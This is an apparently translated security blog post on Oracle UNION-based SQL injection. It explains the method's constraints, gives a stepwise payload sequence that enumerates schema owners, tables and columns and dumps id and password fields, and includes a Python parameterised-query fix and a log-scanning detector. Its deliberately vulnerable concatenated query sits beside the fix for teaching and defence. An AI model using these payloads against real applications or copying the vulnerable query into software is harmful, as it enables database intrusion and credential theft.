ORACLE Union Based


An attack that sends a UNION-based SQL statement and receives, in the application's response, the data the attacker intended to read.

1. Web application conditions

Data returned from the DB by the query completed with the user's input value must come back to the user.

2. Various constraints

Large-object data types cannot be deduplicated (MySQL is the exception).

Large-object data types cannot be sorted (MySQL is the exception).

The number of columns in the lower SELECT must exactly match the number of columns in the upper SELECT.

The data types of the columns selected through UNION must match the types of the data being extracted (MySQL is the exception).

Large-object types used in MySQL: text, ntext, image, etc.

Large-object types used in ORACLE: clob, nclob, blob, etc.

Difference between UNION and UNION ALL

UNION : includes duplicate removal

UNION ALL : does not include duplicate removal

Cases where a Union-based attack is not possible

- Duplicate-ID check feature : in a duplicate-ID check the message shown is a server return value, not a DB return value > Union-based attack not possible

[ This ID cannot be used ] : server return value > Union attack not possible

[ The account 'kitri' already exists. ] : DB return value > Union attack possible

ID : kitri [duplicate check]
Algorithm
1. SELECT id FROM table WHERE id='kitri'
2. If the if statement sees 1 result > [ The account 'kitri' already exists. ]
3. If the if statement sees 0 results > [ This account is available. ]
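The duplicate-ID check above is where "server value or DB value" is decided in code, and it is also where the fix belongs. The Python example below is added to this post and is not the author's code: it writes the same check twice, once with string concatenation and once with a bind parameter, against an in-memory SQLite database that stands in for the Oracle table (the table and column names and the second table are constructed). With a bind parameter the submitted text is always compared as a value, so a quote or a UNION in the input never becomes part of the statement.

```python
import sqlite3

# Constructed stand-in for the application's user table plus a second table
# that an injected UNION could read. SQLite is used only so the example runs
# offline; the point (concatenation vs. bind parameter) is the same on Oracle.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (id TEXT PRIMARY KEY);
        INSERT INTO users VALUES ('kitri'), ('alice');
        CREATE TABLE secrets (note TEXT);
        INSERT INTO secrets VALUES ('internal note');
        """
    )
    return conn


def lookup_vulnerable(conn, user_id):
    # The input is pasted into the SQL text, so whatever it contains is parsed
    # as SQL: a quote ends the literal and a UNION appends a second query.
    sql = "SELECT id FROM users WHERE id='" + user_id + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, user_id):
    # Bind parameter: the driver sends the value separately from the statement,
    # so the text is only ever compared against the id column.
    return [row[0] for row in conn.execute("SELECT id FROM users WHERE id=?", (user_id,))]


def id_exists(conn, user_id, safe=True):
    # The duplicate-ID decision from the post: 1 or more rows -> "already exists".
    rows = lookup_safe(conn, user_id) if safe else lookup_vulnerable(conn, user_id)
    return len(rows) >= 1


def run_demo():
    conn = build_db()
    # Constructed probe in the style of the post's payloads.
    payload = "x' UNION ALL SELECT note FROM secrets --"
    results = {
        "safe_existing": id_exists(conn, "kitri"),
        "safe_new": id_exists(conn, "bob"),
        "safe_payload_rows": lookup_safe(conn, payload),
        "vuln_payload_rows": lookup_vulnerable(conn, payload),
    }
    # A legitimate apostrophe breaks the concatenated statement outright,
    # which is the same defect seen from the availability side.
    try:
        lookup_vulnerable(conn, "o'brien")
        results["vuln_apostrophe_error"] = False
    except sqlite3.OperationalError:
        results["vuln_apostrophe_error"] = True
    results["safe_apostrophe_rows"] = lookup_safe(conn, "o'brien")
    return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

Running it shows the concatenated version answering "already exists" on a row that came from a different table, while the bound version returns no rows for the same input and handles a name containing an apostrophe without a syntax error.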

Attack process

1. Confirm that the statement executes using an ORDER BY clause

2. Confirm that the statement executes using a UNION clause

3. Identify the output positions

' order by 3 --
' order by 7 --
# Column 3 is a large-object type (so ORDER BY 3 fails), and the query has 7 columns

Error

# UNION removes duplicates, so this fails because the 3rd column is a large-object type
' Union SELECT null,null,null,null,null,null,null FROM dual --

# Fixing the error
' Union All SELECT null,null,null,null,null,null,null FROM dual --

# Data types do not match > error
' Union All SELECT '1',null,null,null,null,null,null FROM dual --

# Fixing the error
' Union All SELECT 1,null,null,null,null,null,null FROM dual --

# Check which positions are displayed
'and 1=2 Union All SELECT 1,'2',null,'4',null,null,null FROM dual --

'and 1=2 Union All SELECT DISTINCT 1,owner,null,'4',null,null,null FROM ALL_tables --
# The large-object column gets deduplicated, which raises an error

# Enumerate user names (owners), removing duplicates in a subquery
'and 1=2 Union All SELECT 1,owner,null,'4',null,null,null FROM (SELECT DISTINCT owner FROM ALL_tables) --

# Output after removing duplicate owner / table_name pairs
'and 1=2 Union All SELECT 1,owner,null,table_name,null,null,null FROM (SELECT DISTINCT owner,table_name FROM ALL_tables) --

# Enumerate tables > table names are not duplicated, so no deduplication is needed
'and 1=2 Union All SELECT 1,table_name,null,'4',null,null,null FROM all_tables WHERE owner='C##TEST' --

# Enumerate columns
'and 1=2 Union All SELECT 1,column_name,null,'4',null,null,null FROM all_tab_columns WHERE owner='C##TEST' and table_name='TEST1' --

# Enumerate data
'and 1=2 Union All SELECT idx,id,null,pw,null,null,null FROM C##TEST.TEST1 --

# Use the concatenation operator (||) to combine several fields into one output position
'and 1=2 Union All SELECT idx,id||'#####'||pw,null,phone,null,null,null FROM C##TEST.TEST1 --
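From the detection side, the three-step process above (ORDER BY probing, UNION ALL with NULL padding, then queries against dictionary views such as ALL_TABLES) leaves a recognisable trail in web-server access logs. The Python example below is added here and is not part of the original post: it scans a few constructed Common Log Format lines (source addresses, paths, timestamps and sizes are made up) and tags each request with the probing stage it matches, then counts hits per client. Normalising the query string (URL-decoding, lower-casing, collapsing whitespace) is what makes `Union All` and `union%20all` compare equal.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines in Common Log Format (addresses, paths and
# timestamps are made up). Lines 2-4 mimic the probing sequence from the post.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Jul/2022:10:00:01 +0900] "GET /board.jsp?idx=12 HTTP/1.1" 200 1432
10.0.0.9 - - [06/Jul/2022:10:00:07 +0900] "GET /board.jsp?idx=12%27%20order%20by%207%20-- HTTP/1.1" 500 512
10.0.0.9 - - [06/Jul/2022:10:00:15 +0900] "GET /board.jsp?idx=12%27%20and%201%3D2%20Union%20All%20SELECT%201,null,null,null,null,null,null%20FROM%20dual%20-- HTTP/1.1" 200 1501
10.0.0.9 - - [06/Jul/2022:10:00:21 +0900] "GET /board.jsp?idx=12%27and%201%3D2%20Union%20All%20SELECT%20idx,id,null,pw,null,null,null%20FROM%20C%23%23TEST.TEST1%20-- HTTP/1.1" 200 2210
10.0.0.7 - - [06/Jul/2022:10:01:02 +0900] "GET /search.jsp?q=union+station HTTP/1.1" 200 800
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# Patterns for the stages described in the post, applied to normalised text.
ORDER_BY_RE = re.compile(r"\border\s+by\s+\d+\b")
UNION_SELECT_RE = re.compile(r"\bunion(?:\s+all)?\s+select\b")
FALSE_CONDITION_RE = re.compile(r"\band\s+1\s*=\s*2\b")
DATA_DICT_RE = re.compile(r"\b(?:all_tables|all_tab_columns|dual)\b")


def normalize(raw):
    """URL-decode, lower-case and collapse whitespace so encoding or casing
    variations of the same statement compare equal."""
    return re.sub(r"\s+", " ", unquote_plus(raw).lower())


def classify(path):
    """Return the list of probe tags matched by the query string of a request path."""
    query = path.partition("?")[2]
    if not query:
        return []
    text = normalize(query)
    tags = []
    # A bare number after ORDER BY can be legitimate; the quote that closes a
    # string literal in front of it is what marks column-count probing.
    if "'" in text and ORDER_BY_RE.search(text):
        tags.append("order_by_probe")
    if UNION_SELECT_RE.search(text):
        tags.append("union_select")
    if FALSE_CONDITION_RE.search(text):
        tags.append("false_condition")
    if DATA_DICT_RE.search(text):
        tags.append("data_dictionary")
    return tags


def scan(log_text):
    """Parse each log line and keep only requests that matched at least one tag."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        tags = classify(m.group("path"))
        if tags:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "status": int(m.group("status")), "tags": tags})
    return findings


def count_by_ip(findings):
    """Number of flagged requests per client address, for correlation."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["ts"], f["status"], ",".join(f["tags"]))
    print(count_by_ip(found))
```

Patterns like these are a starting point for a WAF or SIEM rule, not a parser of SQL. The tags are meant to be correlated rather than alerted on one by one: a single client moving from an ORDER BY probe that returns 500 to UNION ALL SELECT against a dictionary view within a few seconds is the sequence the post describes, and the error response on the first step is itself a useful signal, since the method relies on that error to find the column count.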
๋ฐ˜์‘ํ˜•

'๐Ÿ“  Secure' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

SQL Injection - Error Based  (0) 2022.07.06
Oracle Blind Based  (0) 2022.07.06
Oracle database ๊ณต๊ฒฉ ์‹ค์Šต  (0) 2022.07.05
ORACLE INJECTION  (0) 2022.07.05
Blind Injection -2  (0) 2022.07.04
Contents

ํฌ์ŠคํŒ… ์ฃผ์†Œ๋ฅผ ๋ณต์‚ฌํ–ˆ์Šต๋‹ˆ๋‹ค

์ด ๊ธ€์ด ๋„์›€์ด ๋˜์—ˆ๋‹ค๋ฉด ๊ณต๊ฐ ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.